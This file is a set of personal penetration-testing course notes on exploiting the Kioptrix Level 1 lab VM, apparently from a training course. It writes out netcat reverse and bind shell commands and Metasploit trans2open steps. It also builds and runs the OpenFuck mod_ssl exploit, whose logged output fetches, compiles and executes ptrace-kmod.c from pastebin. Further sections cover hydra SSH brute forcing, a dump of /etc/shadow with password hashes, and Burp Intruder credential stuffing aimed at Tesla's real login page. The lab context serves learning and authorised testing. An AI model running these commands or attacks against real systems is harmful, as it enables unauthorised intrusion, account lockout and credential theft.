Skip to content

Latest commit

 

History

History
225 lines (169 loc) · 7.92 KB

12. Exploitation Basics.md

File metadata and controls

225 lines (169 loc) · 7.92 KB
Raw

Exploitation Basics

Reverse Shells vs Bind Shells

netcat

  • reverse shell: a victim connects to us, we executes a linux bin shell when it connects, we're listening. 95% of cases.
  • bind shell: we connect to a port on the target, the victim is listening. Uesful to bypass firewalls.

Reverse shell:

  1. open a port: nc -nvlp 4444
  2. nc 192.168.92.128 4444 -e /bin/bash

Bind shell:

  1. nc -nvlp 4444 -e /bin/bash
  2. connect to our victim: nc 192.168.92.128 4444

Note: 4444 is often blacklisted by antiviruses and firewalls.

Staged vs Non-Staged Payloads

  • non-staged payload: sends exploit shellcode all at once (large size, won't always work) (windows/meterpreter_reverse_tcp)
  • staged payload: sends in stages (can be less stable), metasploit identifies them with an extra / (windows/meterpreter/reverse_tcp)

if one type is not working, try the other one.

Gaining Root with Metasploit

  1. run msfconsole
  2. search trans2open, look for the targeted OS
  3. use 1, then options to know which options to provide
  4. set rhosts 192.168.92.129, then options again to check if it's set and show targets
  5. type run or exploit, the payload is the issue, options again.
  6. set payload linux/x86/shell_reverse_tcp with autocompletion to know our options, now it's a non-staged payload. options again to check if it's set.

we're in:

whoami
root
hostname
kioptrix.level1

Manual Exploitation

With OpenFuck:

  1. git clone https://github.com/heltonWernik/OpenFuck.git && cd OpenFuck
  2. apt install libssl-dev
  3. gcc -o open OpenFuck.c -lcrypto
  4. ./open to know the options you have to pass
  5. ./open 0x6b 192.168.92.129 -c 40, we know the type of machine thanks to our enumeration work, no port needed because we don't use ssl.
whoami
root
hostname
kioptrix.level1

Metasploit is more robust. OSCP certification exam doesn't allow Metasploit. Pen testers look for practicality.

  • sudo -l to know our privileges.
  • cat /etc/passwd to see passwords (only x placeholders, starting at 500 we have usernames: john and harold).
  • cat /etc/shadow with hashes.

Post-exploitation: a new work of enumeration starts.

Brute Force Attacks

SSH

3 reasons to do that in an assessment:

  1. test password strength
  2. test if we can go in with a weak/default password
  3. does the blue team catch us when brute forcing? (being loud sometimes to test the other team)

hydra

  • hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.92.129:22 -t 4 -V, -V for verbosity, -t for threads.

metasploit

  • run msfconsole, then search ssh
  • use auxiliary/scanner/ssh/ssh_login then options
  • set username root and set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt and set rhosts 192.168.92.129 and set threads 10 (would be detected super fast) and set verbose true.
  • run or exploit

Credential Stuffing and Password Spraying

entering stolen credentials (leaked credentials).

Credential Stuffing

  • create textfiles with your users and your passwords.
  • install FoxyProxy Standard in Firefox (easier than the previous method), add a proxy called Burp suite, with 127.0.0.1 as host and 8080 as port, save and then activate the added proxy.
  • go to tesla sign in page, launch burp suite, copy the login post query to the intruder, click Add$ on selected email and again on selected password, select Pitchwork. Go to payloads, paste your list of users, and your list of passwords (simple list, payload set 2).
  • run, monitor status (301 means redirect), change in size is also interesting sometimes.
  • settings, grep feature, paste the expected failed response ("We could not sign you in" in our example), it adds a checkbox to the results (we see it's not working)

Password Spraying

  • click Clear$ and then click Add$ on selected email. Now we test all the emails with a breached password. Select Sniper. Payload is your list of possible emails.

Beware when attacking active accounts, you can lock them. For pen test, know in advance password attempts rules to avoid blocking any client.

These two techniques are the more common way to go in during an assessment. Default credentials work well also. Often, the "house" is well protected from the outside, but not the same once you're inside, often we leave our inside doors opened.

Our Notes, Revisited

SMB - trans2open

msf6 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 192.168.92.128:4444
[*] 192.168.92.129:139 - Trying return address 0xbffffdfc...
[*] 192.168.92.129:139 - Trying return address 0xbffffcfc...
[*] 192.168.92.129:139 - Trying return address 0xbffffbfc...
[*] 192.168.92.129:139 - Trying return address 0xbffffafc...
[*] 192.168.92.129:139 - Trying return address 0xbffff9fc...
[*] 192.168.92.129:139 - Trying return address 0xbffff8fc...
[*] 192.168.92.129:139 - Trying return address 0xbffff7fc...
[*] 192.168.92.129:139 - Trying return address 0xbffff6fc...
[*] Command shell session 1 opened (192.168.92.128:4444 -> 192.168.92.129:32778) at 2024-07-16 10:01:44 -0400

[*] Command shell session 2 opened (192.168.92.128:4444 -> 192.168.92.129:32779) at 2024-07-16 10:01:45 -0400
[*] Command shell session 3 opened (192.168.92.128:4444 -> 192.168.92.129:32780) at 2024-07-16 10:01:46 -0400
[*] Command shell session 4 opened (192.168.92.128:4444 -> 192.168.92.129:32781) at 2024-07-16 10:01:47 -0400
whoami
root
hostname
kioptrix.level1

80 - modssl

./open 0x6b 192.168.92.129 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
race-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; m/raw/C7v25Xr9 -O pt
--15:33:39--  https://pastebin.com/raw/C7v25Xr9
           => `ptrace-kmod.c'
Connecting to pastebin.com:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    0K ...                                                    @   3.84 MB/s

15:33:39 (1.28 MB/s) - `ptrace-kmod.c' saved [4026]

ptrace-kmod.c:183:1: warning: no newline at end of file
/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
whoami
root
hostname
kioptrix.level1

Post Exploitation

cat /etc/shadow
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
daemon:*:14513:0:99999:7:::
adm:*:14513:0:99999:7:::
lp:*:14513:0:99999:7:::
sync:*:14513:0:99999:7:::
shutdown:*:14513:0:99999:7:::
halt:*:14513:0:99999:7:::
mail:*:14513:0:99999:7:::
news:*:14513:0:99999:7:::
uucp:*:14513:0:99999:7:::
operator:*:14513:0:99999:7:::
games:*:14513:0:99999:7:::
gopher:*:14513:0:99999:7:::
ftp:*:14513:0:99999:7:::
nobody:*:14513:0:99999:7:::
mailnull:!!:14513:0:99999:7:::
rpm:!!:14513:0:99999:7:::
xfs:!!:14513:0:99999:7:::
rpc:!!:14513:0:99999:7:::
rpcuser:!!:14513:0:99999:7:::
nfsnobody:!!:14513:0:99999:7:::
nscd:!!:14513:0:99999:7:::
ident:!!:14513:0:99999:7:::
radvd:!!:14513:0:99999:7:::
postgres:!!:14513:0:99999:7:::
apache:!!:14513:0:99999:7:::
squid:!!:14513:0:99999:7:::
pcap:!!:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::

Findings

Undetected malicious activity - 4 and 100 threads (up to 500 root credentials tested without being blocked)